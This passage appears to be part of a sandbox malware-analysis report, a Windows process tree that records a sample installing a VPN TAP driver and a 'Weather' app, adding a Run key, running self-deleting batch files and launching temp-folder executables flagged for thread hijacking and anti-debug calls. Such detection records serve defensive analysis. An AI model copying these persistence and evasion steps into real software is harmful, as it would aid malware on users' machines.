                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4760
                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                          tapinstall.exe remove tap0901
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                          PID:6456
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4616
                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                            tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                            PID:5856
                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:540
                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:6540
                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:6836
                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        PID:7016
                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding EBD8D7A55C8B7821E872398059A58481 C
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:6692
                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 639A0AB21BE7540539275D9E732797B6
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:7208
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                            PID:640
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:8052
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:296
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1e0,0x1f0,0x7ff833be9ec0,0x7ff833be9ed0,0x7ff833be9ee0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:7500
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1676,9765415401276626988,6499802735277289411,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw296_433046681" --mojo-platform-channel-handle=1740 /prefetch:8
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:4548
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1676,9765415401276626988,6499802735277289411,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw296_433046681" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1692 /prefetch:2
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:7588
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1676,9765415401276626988,6499802735277289411,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw296_433046681" --mojo-platform-channel-handle=2124 /prefetch:8
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:5012
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1676,9765415401276626988,6499802735277289411,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw296_433046681" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2540 /prefetch:1
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:7200
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1676,9765415401276626988,6499802735277289411,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw296_433046681" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1900 /prefetch:2
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:5416
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,9765415401276626988,6499802735277289411,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw296_433046681" --mojo-platform-channel-handle=2816 /prefetch:8
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:6112
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,9765415401276626988,6499802735277289411,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw296_433046681" --mojo-platform-channel-handle=3176 /prefetch:8
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:6936
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,9765415401276626988,6499802735277289411,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw296_433046681" --mojo-platform-channel-handle=3396 /prefetch:8
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:4124
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,9765415401276626988,6499802735277289411,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw296_433046681" --mojo-platform-channel-handle=2676 /prefetch:8
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:7280
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,9765415401276626988,6499802735277289411,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw296_433046681" --mojo-platform-channel-handle=3152 /prefetch:8
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:5360
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,9765415401276626988,6499802735277289411,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw296_433046681" --mojo-platform-channel-handle=2112 /prefetch:8
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:7212
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE3D7E.bat" "
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4852
                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                            PID:5448
                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                            C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                            PID:7532
                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                            C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                            PID:6736
                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                            C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE3D7E.bat"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                            PID:5684
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE3D7E.bat" "
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:6200
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:2236
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE3D5E.bat" "
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:6232
                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                PID:4244
                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:6624
                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE3D5E.bat"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                PID:7088
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:5296
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE3D5E.bat" "
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2144
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:7256
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                              PID:6956
                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:7756
                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:7500
                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                  PID:5052
                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                  PID:6548
                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                  PID:4192
                                                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                    DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{09ed9757-68cb-0540-b8cf-112b4a3c5d34}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                    PID:6848
                                                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                    DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000198"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                    PID:4104
                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:7400
                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                    PID:8008
                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:5368
                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                    PID:7556
                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                    PID:7736
                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                    PID:3828
                                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                      MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:5400
                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                    PID:7864
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B736.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\B736.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:5596
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BA54.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BA54.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:6872
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C041.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\C041.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:5044
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C041.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\C041.exe"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:6120
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D8BB.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D8BB.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:7116
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D8BB.exe
                                                                                                                                                                                                                            "{path}"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:4328
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E511.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\E511.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:3660
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\EA90.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\EA90.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              PID:1432
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\F119.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\F119.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:6632
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\FA22.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\FA22.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                PID:7208
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\FA22.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\FA22.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:6108
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:7480
                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:3984
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:6992
                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:4744
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:1256
                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:7564
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:7460
                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:6640
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:8088
                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:4228
                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:6660
